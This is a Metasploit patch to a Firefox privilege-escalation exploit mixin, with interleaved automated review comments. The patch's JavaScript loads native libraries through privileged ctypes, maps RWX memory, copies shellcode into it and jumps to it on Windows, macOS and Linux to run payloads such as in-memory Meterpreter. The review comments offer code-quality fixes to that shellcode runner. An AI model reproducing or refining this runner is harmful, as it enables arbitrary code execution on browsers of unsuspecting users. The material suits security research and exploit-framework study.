From 9bdf57076324597123befb3bf4d6db32a206ee4d Mon Sep 17 00:00:00 2001 From: Joe Vennix Date: Wed, 12 Mar 2014 02:19:28 -0500 Subject: [PATCH] All working now. In-memory meterpreter even. --- .../remote/firefox_privilege_escalation.rb | 74 ++++++++----------- 1 file changed, 32 insertions(+), 42 deletions(-) diff --git a/lib/msf/core/exploit/remote/firefox_privilege_escalation.rb b/lib/msf/core/exploit/remote/firefox_privilege_escalation.rb index 8768550b3f..7e4c045336 100644 --- a/lib/msf/core/exploit/remote/firefox_privilege_escalation.rb +++ b/lib/msf/core/exploit/remote/firefox_privilege_escalation.rb @@ -15,30 +15,26 @@ module Exploit::Remote::FirefoxPrivilegeEscalation # @return [String] javascript code containing the execShellcode() javascript fn def exec_shellcode_source %Q| - var execShellcode = function(shellcode) { - var LIBS = [ - "C:\\\\WINDOWS\\\\system32\\\\user32.dll", - "/usr/lib/libSystem.B.dylib", - "libc.so.6", - "libc.so" - ]; - + var execShellcode = function(shellcode, bytes) { Components.utils.import("resource://gre/modules/ctypes.jsm"); - var openLibs = function(libs) { - var i, lib; - for (i in libs) { - try { - lib = ctypes.open(libs[i]); - return lib; - } catch (e) {} - } - }; - - var lib = openLibs(LIBS); - if (!lib) throw new Error("Could not find lib in ["+LIBS+"]"); - var execPosix = function() { var RWX = 7, ANON_PRIVATE = 4098; + Components.utils.import("resource://gre/modules/ctypes.jsm"); + var LIBS = [ + "/usr/lib/libSystem.B.dylib", + "libc.so.6", + "libc.so" + ]; + + var i, lib; + for (i in LIBS) { + try { + lib = ctypes.open(LIBS[i]); + break; + } catch (e) {} + } + if (!lib) throw new Error("Could not find lib in ["+LIBS+"]"); + var mmap = lib.declare('mmap', ctypes.default_abi, /* calling convention */ ctypes.voidptr_t, /* return type */ 
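Review bot: The new `for (i in LIBS)` loop in execPosix iterates an array with for...in, which yields string keys and also walks any enumerable property added to Array.prototype; a plain index loop is the conventional form, `for (i = 0; i < LIBS.length; i++) {`. The `Components.utils.import("resource://gre/modules/ctypes.jsm")` added at the top of execPosix repeats the import that execShellcode already performs a few lines above and can be dropped. The `lib` handle opened in the loop is never closed anywhere visible here. Both execPosix and the enclosing execShellcode continue past the end of this hunk.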
@@ -56,28 +52,21 @@ module Exploit::Remote::FirefoxPrivilegeEscalation ctypes.voidptr_t, /* src */ ctypes.size_t /* size to copy */ ); - var pthread_create = lib.declare('pthread_create', - ctypes.default_abi, /* calling convention */ - ctypes.int, /* return type */ - ctypes.voidptr_t, /* buffer to store thread struct */ - ctypes.voidptr_t, /* NULL */ - ctypes.voidptr_t, /* fn ptr */ - ctypes.voidptr_t /* NULL */ - ); + var buff = mmap(null, shellcode.length, RWX, ANON_PRIVATE, 0, 0); var pthread_buff = mmap(null, 4096, RWX, ANON_PRIVATE, 0, 0); - var bytes = encodeURI(shellcode).split(/%..\|./).length - 1; - memcpy(buff, ctypes.jschar.array()(shellcode), bytes); + var cstr = ctypes.jschar.array()(shellcode); + //var bytes = ctypes.char.array()(shellcode).length-1; + memcpy(buff, cstr, bytes); /* there is probably a better way to do this */ var m = buff.toString().match(/"0x([0-9a-fA-F]*)"/); if (!m) throw new Error("Could not find address of buffer."); - var fn = ctypes.FunctionType(ctypes.default_abi, ctypes.void_t).ptr(parseInt(m[1], 16)); - //pthread_create(pthread_buff, ) + ctypes.FunctionType(ctypes.default_abi, ctypes.void_t).ptr(parseInt(m[1], 16))(); }; var execWindows = function() { var RWX = 0x40, ANON_PRIVATE = 0x1000; - var VirtualAlloc = lib.declare('VirtualAlloc', + var VirtualAlloc = ctypes.open("Kernel32.dll").declare('VirtualAlloc', ctypes.winapi_abi, /* calling convention */ ctypes.voidptr_t, /* return type */ ctypes.voidptr_t, /* start address (NULL here) */ 
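Review bot: `var pthread_buff = mmap(null, 4096, RWX, ANON_PRIVATE, 0, 0);` survives as a context line, but its only consumer, the `pthread_create` declaration, is removed in this hunk, so it is now a dead 4096-byte mapping that is never unmapped; the line should go with it. The commented-out `//var bytes = ctypes.char.array()(shellcode).length-1;` is dead code sitting next to the live `bytes` parameter and should be deleted rather than kept as a reminder. execPosix starts in the previous hunk and execWindows continues past this one.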
@@ -85,22 +74,22 @@ module Exploit::Remote::FirefoxPrivilegeEscalation ctypes.unsigned_long, /* alloc type */ ctypes.unsigned_long /* protection flags */ ); - var memcpy = lib.declare('memcpy', + var memcpy = ctypes.open("ntdll.dll").declare('memcpy', ctypes.winapi_abi, /* calling convention */ ctypes.voidptr_t, /* return type */ ctypes.voidptr_t, /* dest */ ctypes.voidptr_t, /* src */ ctypes.size_t /* size to copy */ ); - var buff = VirtualAlloc(null, shellcode.length, WIN.ANON_PRIVATE, WIN.RWX); - var bytes = encodeURI(shellcode).split(/%..\|./).length - 1; - memcpy(buff, ctypes.jschar.array()(shellcode), bytes); + var buff = VirtualAlloc(null, shellcode.length, ANON_PRIVATE, RWX); + var cstr = ctypes.jschar.array()(shellcode); + memcpy(buff, cstr, bytes); var m = buff.toString().match(/"0x([0-9a-fA-F]+)"/); if (!m) throw new Error("Could not find address of buffer."); - ctypes.FunctionType(ctypes.default_abi, ctypes.void_t).ptr(parseInt(m[1], 16))(); + ctypes.FunctionType(ctypes.winapi_abi, ctypes.void_t).ptr(parseInt(m[1], 16))(); }; - var i, errs = [], fns = [execPosix, execWindows]; + var i, errs = [], fns = [execWindows, execPosix]; for (i in fns) { try { fns[i](shellcode); @@ -116,12 +105,13 @@ module Exploit::Remote::FirefoxPrivilegeEscalation # @return [String] javascript source code that kicks off the execution of the payload # For a javascript payload, this simply returns the payload source # For a native payload, this calls the correct methods to alloc RWX memory and execute shellcode + # foreverwhile"\xeb\xfe" def run_payload return payload.encoded if js_target? %Q| #{exec_shellcode_source} - var sc = unescape("#{Rex::Text.to_unescape("\xcc"+payload.encoded+"\xc3")}"); - execShellcode(sc); + var sc = unescape("#{Rex::Text.to_unescape(payload.encoded)}"); + execShellcode(sc, #{payload.encoded.bytes.to_a.length}); | end
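Review bot: `ctypes.open("Kernel32.dll")` and `ctypes.open("ntdll.dll")` are now called inline in the `VirtualAlloc` and `memcpy` declarations, so the returned Library handles are never stored and can never be closed; hold each in a local, e.g. `var k32 = ctypes.open("Kernel32.dll");`, and call `close()` on them once the function-pointer call at the end of execWindows has returned. The reordered `fns = [execWindows, execPosix]` is fine, but the `for (i in fns)` loop that follows still uses for...in on an array, the same pattern flagged in the first hunk. execWindows starts in the previous hunk and the loop runs past the end of this one.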
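Review bot: The line `# foreverwhile"\xeb\xfe"` added to the YARD block above `run_payload` reads as a leftover working note rather than documentation, and since it sits inside the doc comment it will be rendered into the method's generated docs; remove it or replace it with a sentence that actually explains what it refers to. In the same hunk `#{payload.encoded.bytes.to_a.length}` can be written as `#{payload.encoded.bytesize}`, which is the idiomatic Ruby and avoids materialising a throwaway array just to count it.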